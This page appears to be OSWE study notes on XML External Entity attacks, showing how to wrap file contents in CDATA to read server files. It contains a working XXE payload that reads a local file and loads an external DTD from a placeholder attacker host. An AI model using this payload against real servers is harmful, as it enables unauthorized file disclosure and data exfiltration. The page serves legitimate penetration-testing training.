💻
OSWE Everything
💻
OSWE Everything
  • VULNERABILITIES
    • Type Juggling
    • Cross Site Scripting
      • Hunting for files
    • Insecure Deserialization
      • .NET
    • SQL Injection
      • Blind SQL Injection
      • SQLi debugging
      • Code review
      • Errors and additional information
      • Approaches to leverage different databases
    • XML External Entity (XXE)
      • Types of XML Entities
      • Exploitation
      • Wrappers for errors
      • Post Exploitation
    • OS Command Injection
      • Exploitation
    • Server Side Template Injection
      • Exploitation
    • Authentication Bypass
      • Checklist
  • Unsecure Random Function
    • Exploitation
  • Cross Origin Resource Sharing (CORS)
    • Prerequisites of Exploitation
  • Client Side Request Forgery (CSRF)
    • Prerequisites of Exploitation
  • Exploit Writing
    • Cheatsheet
    • Skeleton Scripts
  • Code review
    • Manual code review
      • Routing
      • Searching for exploits
      • Debugging
    • Decompilation
      • Java
      • .NET
    • Managing the application
      • Identifying application file location
      • Restarting web applications
      • Manipulation of Assembly Attributes for Debugging (.NET)
  • Preparation Machines
    • [HTB] Vault
    • Other HTB scripts
  • ADDITIONAL INFORMATION
    • Sources
  • External Resources
    • WhiteBox Pentest
Powered by GitBook
On this page
  • Escaping characters
  • Wrapper
  1. VULNERABILITIES
  2. XML External Entity (XXE)

Wrappers for errors

Escaping characters

Error while reading XML files from the server?

Use CDATA which will make character escaping impossible.

Wrap file contents between these tags: "<![CDATA[" output "]]>"

It is worth mentioning we cannot reach another entity using another entity within the same dtd. That is why we use parameter entities referenced by the wrappers in external DTD file.

Wrapper

Catch the file with self hosted file in fileserver:

<!ENTITY wrapper "%start;%file;%end;">

Application vulnerable part.

<?xml version="1.0"?>
<!DOCTYPE data [
// Create the entities
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///etc/file.xml" >
<!ENTITY % end "]]>">

// Access the external DTD to execute entities and 
// return escaped result.
<!ENTITY % dtd SYSTEM "http://<ATTACKER_IP>/wrapper.dtd" >
%dtd;
]>


[in the body of the request use &wrapper; to reach for
external code loaded by XML]

That was the process of wrapping the XML file contents into CDATA in order to avoid character escaping and errors during payload execution.

Now we can read whatever file we want, even if it has characters like "<" or ">".

PreviousExploitationNextPost Exploitation

Last updated 1 month ago